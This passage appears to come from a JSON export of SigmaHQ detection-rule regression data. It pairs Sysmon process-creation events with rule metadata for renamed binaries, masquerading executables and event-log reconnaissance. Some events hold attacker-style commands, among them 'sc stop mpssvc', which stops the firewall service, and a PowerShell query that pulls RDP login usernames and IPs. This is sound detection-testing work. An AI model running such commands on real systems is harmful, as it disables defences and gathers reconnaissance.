\"MD5=28B5A3688253FD5822EE90BCAE2633F7,SHA256=7482890B1875BDCEC826F3385EAC7DCDC38F17358A13B1B8C790BDB895FF5054,IMPHASH=06F091DBEC9C3F0DD14808FFE59B95DE\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary/info.yml",
    "content": "id: e9861f82-77a9-4f8b-a418-0fbb6019588b\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142\n      title: Potential Defense Evasion Via Binary Rename\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:28:22.116872Z\"\n        }\n      },\n      \"EventRecordID\": 256810,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:28:22.113\",\n      \"ProcessGuid\": \"5AB40FD1-3E66-68F9-2831-000000003B02\",\n      \"ProcessId\": 4832,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\renamed-wscript.exe\",\n      \"FileVersion\": \"5.812.10240.16384\",\n      \"Description\": \"Microsoft ® Windows Based Script Host\",\n      \"Product\": \"Microsoft ® Windows Script Host\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"wscript.exe\",\n      \"CommandLine\": \"renamed-wscript.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"MD5=BA3DDE938146C1C1A19D6762E0BF5311,SHA256=61891E70C5629397DD107066F520D1663C5136AB4366E0CB015EC1D047DFFC61,IMPHASH=EB3973026D64331DD575543A07621F9D\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml",
    "content": "id: 8fc87eda-5a7b-4080-93c6-5bf6145330c8\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e\n      title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:30:29.328671Z\"\n        }\n      },\n      \"EventRecordID\": 256840,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:30:29.319\",\n      \"ProcessGuid\": \"5AB40FD1-3EE5-68F9-3A31-000000003B02\",\n      \"ProcessId\": 480,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\renamed-curl.exe\",\n      \"FileVersion\": \"8.13.0\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"renamed-curl.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_curl/info.yml",
    "content": "id: a8016fa4-d7e0-40de-85b0-ae04f270eec5\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 7530cd3d-7671-43e3-b209-976966f6ea48\n      title: Renamed CURL.EXE Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:25:23.218638Z\"\n        }\n      },\n      \"EventRecordID\": 256757,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:25:23.215\",\n      \"ProcessGuid\": \"5AB40FD1-3DB3-68F9-0A31-000000003B02\",\n      \"ProcessId\": 5312,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\renamed-ftp.exe\",\n      \"FileVersion\": \"10.0.20348.3451 (WinBuild.160101.0800)\",\n      \"Description\": \"File Transfer Program\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"ftp.exe\",\n      \"CommandLine\": \"renamed-ftp.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"MD5=02EF5C4F3C041DE47811498C331B6F46,SHA256=B551CF05B43639364EFC71995E19DB620F5EFCE311110D0CF932354C3FE6ED7A,IMPHASH=7B22256667E90FDEA4DBB956FD02584C\",\n      \"ParentProcessGuid\": \"5AB40FD1-8DEB-68F7-7E01-000000003B02\",\n      \"ParentProcessId\": 476,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/info.yml",
    "content": "id: 280664b2-b588-40f6-8b65-280523049740\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 277a4393-446c-449a-b0ed-7fdc7795244c\n      title: Renamed FTP.EXE Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:32:00.478719Z\"\n        }\n      },\n      \"EventRecordID\": 256855,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:32:00.468\",\n      \"ProcessGuid\": \"5AB40FD1-3F40-68F9-4431-000000003B02\",\n      \"ProcessId\": 2808,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\renamed-msdt.exe\",\n      \"FileVersion\": \"10.0.20348.2849 (WinBuild.160101.0800)\",\n      \"Description\": \"Diagnostics Troubleshooting Wizard\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"msdt.exe\",\n      \"CommandLine\": \"renamed-msdt.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"MD5=7C70F1DDC865BCFF963AD1CCFAA5E145,SHA256=377DD147174704790E2E981893E49FB72CE18133CF7E9E2EAA794ADF2F80D2DA,IMPHASH=9F0D1C67FCB6D4D5059556FF5E9A642B\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_msdt/info.yml",
    "content": "id: 0e26deb8-bbad-45fb-bb52-b5a2204ba626\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: bd1c6866-65fc-44b2-be51-5588fcff82b9\n      title: Renamed Msdt.EXE Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:33:27.276702Z\"\n        }\n      },\n      \"EventRecordID\": 256875,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:33:27.274\",\n      \"ProcessGuid\": \"5AB40FD1-3F97-68F9-5631-000000003B02\",\n      \"ProcessId\": 3424,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\sc.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Service Control Manager Configuration Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"sc.exe\",\n      \"CommandLine\": \"sc  stop mpssvc\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": 
\"MD5=6FB10CD439B40D92935F8F6A0C99670A,SHA256=2BF663EA493CDC21AD33AEBD8DA40CC5D2AFA55E24F9E1BBF3D73E99DCADF693,IMPHASH=803254E010814E69947095A2725B2AFD\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/info.yml",
    "content": "id: 81ea361b-6e7b-417c-8f70-abd288b10c35\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 81bcb81b-5b1f-474b-b373-52c871aaa7b1\n      title: Stop Windows Service Via Sc.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon/beaa66d6-aa1b-4e3c-80f5-e0145369bfaf.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-03T07:42:38.210937Z\"\n        }\n      },\n      \"EventRecordID\": 26765,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3116,\n          \"ThreadID\": 1656\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-03 07:42:38.149\",\n      \"ProcessGuid\": \"0197231E-E9EE-692F-B004-000000000900\",\n      \"ProcessId\": 9720,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"FileVersion\": \"10.0.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows PowerShell\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"PowerShell.EXE\",\n      \"CommandLine\": \"powershell  -Command \\\"Get-WinEvent -LogName 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' | Where-Object {$_.Id -eq 21} | ForEach-Object { $eventXml = [xml]$_.ToXml(); $username = $eventXml.Event.UserData.EventXML.User; $ipAddress = $eventXml.Event.UserData.EventXML.Address; $loginTime = $_.TimeCreated; if ($username -and $ipAddress -and 
$loginTime) { Write-Output ('User: ' + $username + ' IP: ' + $ipAddress + ' Login Time: ' + $loginTime) }}\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-BBFB-692F-3C8C-050000000000\",\n      \"LogonId\": \"0x58c3c\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=1736263E02468939F808C0528E8DBB7E,SHA256=1F9FFC2227F8DEA8B771D543C464CF8166C22A39420A5322B5892A640C4B34B6,IMPHASH=68A9FF9C8D0D4655E46E1A7A190A41D2\",\n      \"ParentProcessGuid\": \"0197231E-E967-692F-A904-000000000900\",\n      \"ParentProcessId\": 9076,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon/info.yml",
    "content": "id: a31979d4-d358-47c1-b698-875ec379a3c1\ndescription: N/A\ndate: 2025-12-03\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf\n      title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon/beaa66d6-aa1b-4e3c-80f5-e0145369bfaf.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly/e4a6b256-3e47-40fc-89d2-7a477edd6915.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-02-04T08:52:58.205267Z\"\n        }\n      },\n      \"EventRecordID\": 715573,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 776,\n          \"ThreadID\": 4344\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2026-02-04 08:52:58.203\",\n      \"ProcessGuid\": \"14207D89-08EA-6983-2A02-000000004402\",\n      \"ProcessId\": 5696,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\taskhost.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Calculator\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CALC.EXE\",\n      \"CommandLine\": \"taskhost.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-057C-6983-A047-0C0000000000\",\n      \"LogonId\": \"0xc47a0\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=1FD4DD58C75D6F2EDCDB337EE686231E,SHA256=4208893C871D2499F184E3F0F2554DA89F451FA9E98D95FC9516C5AE8F2B3BBD,IMPHASH=8EEAA9499666119D13B3F44ECD77A729\",\n      \"ParentProcessGuid\": \"14207D89-08EA-6983-2902-000000004402\",\n      \"ParentProcessId\": 1816,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"cmd  /c taskhost.exe\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly/info.yml",
    "content": "id: 0efa6f32-c1df-4053-91ca-cafc05416e79\ndescription: N/A\ndate: 2026-02-04\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: e4a6b256-3e47-40fc-89d2-7a477edd6915\n      title: System File Execution Location Anomaly\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly/e4a6b256-3e47-40fc-89d2-7a477edd6915.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution/be58d2e2-06c8-4f58-b666-b99f6dc3b6cd.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-02-04T08:47:45.988926Z\"\n        }\n      },\n      \"EventRecordID\": 715337,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 776,\n          \"ThreadID\": 4344\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2026-02-04 08:47:45.987\",\n      \"ProcessGuid\": \"14207D89-07B1-6983-EA01-000000004402\",\n      \"ProcessId\": 5592,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\svchost.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Calculator\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CALC.EXE\",\n      \"CommandLine\": \".\\\\svchost.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-057C-6983-A047-0C0000000000\",\n      \"LogonId\": \"0xc47a0\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=1FD4DD58C75D6F2EDCDB337EE686231E,SHA256=4208893C871D2499F184E3F0F2554DA89F451FA9E98D95FC9516C5AE8F2B3BBD,IMPHASH=8EEAA9499666119D13B3F44ECD77A729\",\n      \"ParentProcessGuid\": \"14207D89-0781-6983-E201-000000004402\",\n      \"ParentProcessId\": 984,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution/info.yml",
    "content": "id: 9cee7767-9219-40b3-b77e-dedf82957c94\ndescription: N/A\ndate: 2026-02-04\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: be58d2e2-06c8-4f58-b666-b99f6dc3b6cd\n      title: Suspicious Process Masquerading As SvcHost.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution/be58d2e2-06c8-4f58-b666-b99f6dc3b6cd.evtx\n"
  },
  {
